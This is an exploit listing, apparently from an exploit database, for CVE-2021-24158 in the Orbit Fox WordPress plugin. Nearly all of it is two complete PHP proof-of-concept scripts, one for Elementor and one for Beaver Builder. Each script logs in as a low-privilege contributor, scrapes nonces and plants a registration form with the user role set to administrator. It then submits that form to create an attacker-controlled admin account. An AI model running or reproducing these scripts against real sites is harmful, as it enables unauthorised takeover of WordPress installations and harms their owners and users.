Exploit for Orbit Fox by ThemeIsle < 2.10.3 - Authenticated Privilege Escalation CVE-2021-24158

Name: Exploit for Orbit Fox by ThemeIsle < 2.10.3 - Authenticated Privilege Escalation CVE-2021-24158
Rating: 5 (70 reviews)
2021-01-12 | CVSS -0.1
## https://sploitus.com/exploit?id=WPEX-ID:D81D0E72-9BB5-47EF-A796-3B305A4B604F
Elementor PoC

<?php

// Settings
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];


$proxy = '127.0.0.1:8081';
$urlbits = parse_url( $siteurl );
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

//Json Encode Our New Post
$data = array(
    "title" => "Exploit Post",
    "content" => "<!-- wp:paragraph -->\nSample\n<!-- /wp:paragraph -->",
    "status"=>"pending");

$postdata = json_encode($data);

//Get Json post data length
$length = strlen($postdata);

echo 'Logging in!';

// 1) Log in as contributor+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Grabbing Rest API!';
// Pull the Rest API Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];

echo 'Creating New Post and Grabbing Page ID!';
//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
$test = curl_exec($ch);

//Grab the page-id
preg_match('/"id":([^"]+),/', $test, $matches);
$pageid = $matches[1];

echo 'Getting Another Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/post.php?post=' . $pageid . '&action=elementor');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/"nonce":"([^"]+)"},"connect/', $content, $matches);
$elementornonce = $matches[1];

echo 'Adding New User Form!';
//Upload a file
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'actions' => '{"save_builder":{"action":"save_builder","data":{"status":"publish","elements":[{"id":"be9a476","elType":"section","isInner":false,"settings":{},"elements":[{"id":"7ea305d","elType":"column","isInner":false,"settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6edacb5","elType":"widget","isInner":false,"settings":{"form_fields":[{"key":"username","type":"text","label":"User Name","require":"required","placeholder":"User Name","field_width":"100","field_map":"user_login","_id":"3aef8c5","requirement":"","field_width_tablet":"","field_width_mobile":""},{"key":"email","type":"email","label":"Email","require":"required","placeholder":"Email","field_width":"100","field_map":"user_email","_id":"08c574b","requirement":"","field_width_tablet":"","field_width_mobile":""},{"key":"password","type":"password","label":"Password","require":"required","placeholder":"Password","field_width":"100","field_map":"user_pass","_id":"5f76a2d","requirement":"","field_width_tablet":"","field_width_mobile":""}],"submit_label":"Register","user_role":"administrator"},"elements":[],"widgetType":"content_form_registration"}]}]}],"settings":{"post_title":"BadPost","post_status":"pending"}}}}',
    '_nonce' => $elementornonce,
    'editor_post_id' => $pageid,
    'initial_document_id' => $pageid,
    'action' => 'elementor_ajax'
] );
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting Another Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&preview=true');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$register = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/"_wpnonce_registration"\svalue="([^"]+)"/', $register, $matches);
$registernonce = $matches[1];

//Import Nonce
preg_match('/contentFormsSettings(.)*"nonce":"([^"]+)"}/', $register, $matches);
$formnonce = $matches[2];

echo 'Adding New User!';
//Upload a file
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-json/content-forms/v1/submit' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    "X-WP-Nonce: $formnonce"));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'form_type' => 'registration',
    'form_id' => '6edacb5',
    'post_id' => $pageid,
    'form_builder' => 'elementor',
    'data[6edacb5][USER_LOGIN]' => 'hax0r',
    'data[6edacb5][USER_EMAIL]' => 'a@a.com',
    'data[6edacb5][USER_PASS]' => 'hax0r',
    'nonce' => $registernonce,

] );
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

Beaver Builder PoC
<?php

// Settings
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];


$proxy = '127.0.0.1:8081';
$urlbits = parse_url( $siteurl );
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

//Json Encode Our New Post
$data = array(
    "title" => "Exploit Post",
    "content" => "<!-- wp:paragraph -->\nSample\n<!-- /wp:paragraph -->",
    "status"=>"pending");

$postdata = json_encode($data);

//Get Json post data length
$length = strlen($postdata);

echo 'Logging in!';

// 1) Log in as contributor+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Grabbing Rest API!';
// Pull the Rest API Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];

echo 'Creating New Post and Grabbing Page ID!';
//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
$test = curl_exec($ch);

//Grab the page-id
preg_match('/"id":([^"]+),/', $test, $matches);
$pageid = $matches[1];

echo 'Getting Another Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/ajaxNonce":"([^"]+)","builderEnabled"/', $content, $matches);
$beavernonce = $matches[1];

echo 'Getting Node!';
//Getting Node
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder');
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'fl_builder_data[action]' => 'render_new_module',
    'fl_builder_data[parent_id]' => '0',
    'fl_builder_data[type]' => 'class-themeisle-content-forms-beaver-registration',
    'fl_builder_data[position]' => '-1',
    'fl_builder_data[_wpnonce]' => $beavernonce,
    'fl_builder_data[post_id]' => $pageid,
    'fl_builder_data[fl_builder]' => '1',
    'fl_builder_data[fl_action]' => 'render_new_module'
] );
$node = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/"nodeId":"([^"]+)"/', $node, $matches);
$nodeID = $matches[1];

echo 'Adding New User Form!';
//Upload a file
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'fl_builder_data[action]' => 'save_settings',
    'fl_builder_data[node_id]' => $nodeID,
    'fl_builder_data[settings][fields][]' => '{"label":"User Name","placeholder":"User Name","type":"text","field_width":"100","field_width_medium":"","field_width_responsive":"","required":"required","field_map":"user_login","key":"username"}',
    'fl_builder_data[settings][fields][]' => '{"label":"Email","placeholder":"Email","type":"email","field_width":"100","field_width_medium":"","field_width_responsive":"","required":"required","field_map":"user_email","key":"email"}',
    'fl_builder_data[settings][fields][]' => '{"label":"Password","placeholder":"Password","type":"password","field_width":"100","field_width_medium":"","field_width_responsive":"","required":"required","field_map":"user_pass","key":"password"}',
    'fl_builder_data[settings][hide_label]' => 'show',
    'fl_builder_data[settings][submit_label]' => 'register',
    'fl_builder_data[settings][user_role]' => 'administrator',
    'fl_builder_data[_wpnonce]' => $beavernonce,
    'fl_builder_data[post_id]' => $pageid,
    'fl_builder_data[fl_builder]' => '1',
    'fl_builder_data[fl_action]' => 'save_settings'

] );
$output = curl_exec($ch);
curl_close($ch);

echo 'Adding New User Form!';
//Upload a file
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&fl_builder' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'fl_builder_data[action]' => 'save_layout',
    'fl_builder_data[publish]' => 'true',
    'fl_builder_data[exit]' => '1',
    'fl_builder_data[_wpnonce]' => $beavernonce,
    'fl_builder_data[post_id]' =>  $pageid,
    'fl_builder_data[fl_builder]' => '1',
    'fl_builder_data[fl_action]' => 'save_layout'

] );
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting Another Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/?p=' . $pageid . '&preview=true');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$register = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/"_wpnonce_registration"\svalue="([^"]+)"/', $register, $matches);
$registernonce = $matches[1];

//Import Nonce
preg_match('/contentFormsSettings(.)*"nonce":"([^"]+)"}/', $register, $matches);
$formnonce = $matches[2];

echo 'Adding New User!';
//Upload a file
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-json/content-forms/v1/submit' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array(
    "X-WP-Nonce: $formnonce"));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'form_type' => 'registration',
    'form_id' => $nodeID,
    'post_id' => $pageid,
    'form_builder' => 'beaver',
    'data[' . $nodeID . '][USER_LOGIN]' => 'hax0r4',
    'data['. $nodeID .'][USER_EMAIL]' => 'a4@a.com',
    'data['. $nodeID .'][USER_PASS]' => 'hax0r',
    'nonce' => $registernonce,

] );
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>